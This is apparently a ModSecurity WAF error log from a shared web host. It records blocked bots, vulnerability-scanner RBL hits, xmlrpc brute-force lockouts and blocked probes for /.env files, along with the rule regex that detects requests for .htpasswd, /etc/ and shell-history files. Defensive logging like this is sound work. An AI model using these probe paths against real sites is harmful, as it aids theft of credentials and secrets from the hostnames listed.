[Tue May 26 13:20:13.089492 2026] [security2:error] [pid 501489:tid 501632] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQtGkFNZ9cRlz80IjlswAAAJI"]
[Tue May 26 13:20:15.453783 2026] [security2:error] [pid 501489:tid 501711] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQt2kFNZ9cRlz80Ijl5gAAAOA"]
[Tue May 26 13:20:15.470117 2026] [security2:error] [pid 501489:tid 501668] [client 91.196.152.250:54641] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.commune.azurmediatec.com"] [uri "/index.php"] [unique_id "ahVQtmkFNZ9cRlz80Ijl3QAAALU"]
[Tue May 26 13:20:17.369180 2026] [security2:error] [pid 501489:tid 501695] [client 74.249.173.207:4115] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/404.php"] [unique_id "ahVQuWkFNZ9cRlz80IjmLwAAANA"]
[Tue May 26 13:20:17.696459 2026] [security2:error] [pid 501489:tid 501666] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQuWkFNZ9cRlz80IjmKgAAALM"]
[Tue May 26 13:20:18.417804 2026] [security2:error] [pid 501489:tid 501748] [client 85.208.96.201:41554] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/7/"] [unique_id "ahVQumkFNZ9cRlz80IjmSwAAAQE"]
[Tue May 26 13:20:18.417920 2026] [security2:error] [pid 501489:tid 501748] [client 85.208.96.201:41554] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/7/"] [unique_id "ahVQumkFNZ9cRlz80IjmSwAAAQE"]
[Tue May 26 13:20:18.908765 2026] [security2:error] [pid 501489:tid 501494] [remote 91.211.32.121:38891] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "businessclubinternational.net"] [uri "/wp-content/plugins/user-registration-advanced-fields/readme.txt"] [unique_id "ahVQumkFNZ9cRlz80IjmUgAA1wQ"], referer: https://businessclubinternational.net/
[Tue May 26 13:20:20.089370 2026] [security2:error] [pid 501489:tid 501725] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQu2kFNZ9cRlz80IjmcAAAAO0"]
[Tue May 26 13:20:22.781120 2026] [security2:error] [pid 501489:tid 501670] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQvmkFNZ9cRlz80IjmugAAALc"]
[Tue May 26 13:20:23.081573 2026] [security2:error] [pid 501489:tid 501729] [client 77.83.3.101:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQvmkFNZ9cRlz80IjmwwAAAPA"]
[Tue May 26 13:20:24.186066 2026] [security2:error] [pid 501489:tid 501661] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQv2kFNZ9cRlz80Ijm6QAAAK4"]
[Tue May 26 13:20:25.304472 2026] [security2:error] [pid 501489:tid 501623] [client 74.249.173.207:4367] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/wp-admin/user/index.php"] [unique_id "ahVQwWkFNZ9cRlz80IjnJgAAAIk"]
[Tue May 26 13:20:26.533407 2026] [security2:error] [pid 501489:tid 501664] [client 34.139.181.181:54141] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahVQwWkFNZ9cRlz80IjnOAAAALE"]
[Tue May 26 13:20:26.746981 2026] [security2:error] [pid 501489:tid 501666] [client 34.139.181.181:53926] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahVQwmkFNZ9cRlz80IjnSAAAALM"]
[Tue May 26 13:20:27.184586 2026] [security2:error] [pid 501489:tid 501658] [client 34.139.181.181:62971] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahVQw2kFNZ9cRlz80IjnXQAAAKs"]
[Tue May 26 13:20:27.192759 2026] [security2:error] [pid 501489:tid 501622] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQwmkFNZ9cRlz80IjnTQAAAIg"]
[Tue May 26 13:20:27.536323 2026] [security2:error] [pid 501489:tid 501673] [client 34.139.181.181:62686] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahVQw2kFNZ9cRlz80IjnaQAAALo"]
[Tue May 26 13:20:27.749783 2026] [security2:error] [pid 501489:tid 501696] [client 34.139.181.181:52483] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahVQw2kFNZ9cRlz80IjnagAAANE"]
[Tue May 26 13:20:27.960523 2026] [security2:error] [pid 501489:tid 501617] [remote 211.23.68.235:3011] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVQw2kFNZ9cRlz80IjnawAA3H8"]
[Tue May 26 13:20:28.086834 2026] [security2:error] [pid 501489:tid 501680] [client 34.139.181.181:51415] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahVQxGkFNZ9cRlz80IjncgAAAME"]
[Tue May 26 13:20:28.404970 2026] [security2:error] [pid 501489:tid 501701] [client 34.139.181.181:56785] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahVQxGkFNZ9cRlz80IjneQAAANY"]
[Tue May 26 13:20:28.639981 2026] [security2:error] [pid 501489:tid 501692] [client 34.139.181.181:49356] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahVQxGkFNZ9cRlz80IjnegAAAM0"]
[Tue May 26 13:20:28.911938 2026] [security2:error] [pid 501489:tid 501671] [client 34.139.181.181:52015] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahVQxGkFNZ9cRlz80IjnhQAAALg"]
[Tue May 26 13:20:29.272780 2026] [security2:error] [pid 501489:tid 501723] [client 34.139.181.181:56346] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahVQxWkFNZ9cRlz80IjnkAAAAOs"]
[Tue May 26 13:20:29.528029 2026] [security2:error] [pid 501489:tid 501657] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQxWkFNZ9cRlz80IjnjgAAAKo"]
[Tue May 26 13:20:29.715984 2026] [security2:error] [pid 501489:tid 501658] [client 114.119.132.163:63367] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "moneyapp.com.co"] [uri "/politica-uso-de-redes-sociales"] [unique_id "ahVQxWkFNZ9cRlz80IjnogAAAKs"], referer: https://www.moneyapp.com.co/
[Tue May 26 13:20:29.728763 2026] [security2:error] [pid 501489:tid 501745] [client 34.139.181.181:64100] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahVQxWkFNZ9cRlz80IjnoQAAAP4"]
[Tue May 26 13:20:30.020364 2026] [security2:error] [pid 501489:tid 501662] [client 34.139.181.181:54529] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahVQxmkFNZ9cRlz80IjnpgAAAK8"]
[Tue May 26 13:20:30.020480 2026] [security2:error] [pid 501489:tid 501662] [client 34.139.181.181:54529] ModSecurity: Warning. Operator GE matched 2 at IP:dos_burst_counter. [file "/etc/httpd/modsecurity.d/03_asl_dos.conf"] [line "99"] [id "350114"] [rev "1"] [msg "Atomicorp.com WAF Rules: Potential Denial of Service (DoS) Attack from - # of Request Bursts: 2"] [severity "ERROR"] [tag "no_ar"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahVQxmkFNZ9cRlz80IjnpgAAAK8"]
[Tue May 26 13:20:30.020505 2026] [security2:error] [pid 501489:tid 501662] [client 34.139.181.181:54529] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahVQxmkFNZ9cRlz80IjnpgAAAK8"]
[Tue May 26 13:20:31.163523 2026] [security2:error] [pid 501489:tid 501669] [client 74.249.173.207:4364] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/wp-conf.php"] [unique_id "ahVQx2kFNZ9cRlz80IjnvwAAALY"]
[Tue May 26 13:20:31.994957 2026] [security2:error] [pid 501489:tid 501709] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQx2kFNZ9cRlz80IjnywAAAN4"]
[Tue May 26 13:20:34.060558 2026] [security2:error] [pid 501489:tid 501619] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQyWkFNZ9cRlz80Ijn8wAAAIU"]
[Tue May 26 13:20:35.251134 2026] [security2:error] [pid 501489:tid 501524] [remote 173.249.21.166:51106] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 166.21.249.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahVQy2kFNZ9cRlz80IjoFgAA8SI"]
[Tue May 26 13:20:35.921114 2026] [security2:error] [pid 501489:tid 501748] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQy2kFNZ9cRlz80IjoIgAAAQE"]
[Tue May 26 13:20:37.085012 2026] [security2:error] [pid 501489:tid 501727] [client 176.65.139.235:24574] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.kumarindustry.svijaykumar.in"] [uri "/.env"] [unique_id "ahVQzWkFNZ9cRlz80IjoPgAAAO4"]
[Tue May 26 13:20:37.448465 2026] [security2:error] [pid 501489:tid 501733] [client 176.65.139.236:16506] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.maharajancars.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahVQzWkFNZ9cRlz80IjoRQAAAPM"]
[Tue May 26 13:20:38.342777 2026] [security2:error] [pid 501489:tid 501717] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQzWkFNZ9cRlz80IjoWAAAAOY"]
[Tue May 26 13:20:38.389724 2026] [security2:error] [pid 501489:tid 501663] [client 176.65.139.231:44746] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.acacia.svijaykumar.in"] [uri "/.env"] [unique_id "ahVQzmkFNZ9cRlz80IjoXwAAALA"]
[Tue May 26 13:20:41.178750 2026] [security2:error] [pid 501489:tid 501725] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQ0GkFNZ9cRlz80IjongAAAO0"]
[Tue May 26 13:20:41.788133 2026] [security2:error] [pid 501489:tid 501729] [client 176.65.139.233:19940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "acacia.org.in"] [uri "/.env"] [unique_id "ahVQ0WkFNZ9cRlz80IjotAAAAPA"]
[Tue May 26 13:20:43.544187 2026] [security2:error] [pid 501489:tid 501723] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQ02kFNZ9cRlz80IjozwAAAOs"]
[Tue May 26 13:20:45.949222 2026] [security2:error] [pid 501489:tid 501621] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQ1WkFNZ9cRlz80IjpCwAAAIc"]
[Tue May 26 13:20:47.965374 2026] [security2:error] [pid 501489:tid 501653] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQ12kFNZ9cRlz80IjpRgAAAKY"]
[Tue May 26 13:20:48.079673 2026] [security2:error] [pid 501489:tid 501733] [client 14.188.126.143:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQ12kFNZ9cRlz80IjpUAAAAPM"]
[Tue May 26 13:20:48.714462 2026] [security2:error] [pid 501489:tid 501712] [client 4.204.220.190:9120] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.techawarness.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVQ2GkFNZ9cRlz80IjpZwAAAOE"]
[Tue May 26 13:20:48.714595 2026] [security2:error] [pid 501489:tid 501712] [client 4.204.220.190:9120] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.techawarness.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVQ2GkFNZ9cRlz80IjpZwAAAOE"]
[Tue May 26 13:20:48.859962 2026] [security2:error] [pid 501489:tid 501629] [client 4.204.220.190:9148] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.techawarness.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahVQ2GkFNZ9cRlz80IjpawAAAI8"]
[Tue May 26 13:20:48.860062 2026] [security2:error] [pid 501489:tid 501629] [client 4.204.220.190:9148] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.techawarness.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahVQ2GkFNZ9cRlz80IjpawAAAI8"]
[Tue May 26 13:20:49.044432 2026] [security2:error] [pid 501489:tid 501627] [client 74.7.230.10:50248] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.prototypecommune.azurmediatec.com"] [uri "/robots.txt"] [unique_id "ahVQ2WkFNZ9cRlz80IjpcAAAjQI"]
[Tue May 26 13:20:50.744602 2026] [security2:error] [pid 501489:tid 501687] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQ2mkFNZ9cRlz80IjplAAAAMg"]
[Tue May 26 13:20:51.115229 2026] [security2:error] [pid 501489:tid 501648] [client 176.65.139.239:34278] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "traderscafe.club.jiyani.in"] [uri "/.env"] [unique_id "ahVQ22kFNZ9cRlz80IjppwAAAKE"]
[Tue May 26 13:20:51.284215 2026] [security2:error] [pid 501489:tid 501713] [client 114.119.136.72:61427] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahVQ22kFNZ9cRlz80IjpqwAAAOI"], referer: https://gti-club.ru/forum/showthread.php?t=49528
[Tue May 26 13:20:52.885936 2026] [security2:error] [pid 501489:tid 501680] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQ3GkFNZ9cRlz80IjpxwAAAME"]
[Tue May 26 13:20:53.296109 2026] [security2:error] [pid 501489:tid 501662] [client 176.65.139.231:31864] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.traderscafe.jiyani.in"] [uri "/.env"] [unique_id "ahVQ3WkFNZ9cRlz80Ijp5QAAAK8"]
[Tue May 26 13:20:55.376756 2026] [security2:error] [pid 501489:tid 501674] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQ3mkFNZ9cRlz80IjqGgAAALs"]
[Tue May 26 13:20:57.562349 2026] [security2:error] [pid 501489:tid 501626] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQ4WkFNZ9cRlz80IjqXQAAAIw"]
[Tue May 26 13:20:58.314327 2026] [security2:error] [pid 501489:tid 501496] [remote 74.7.241.58:50846] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVQ4mkFNZ9cRlz80IjqcgAAmgY"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/lib
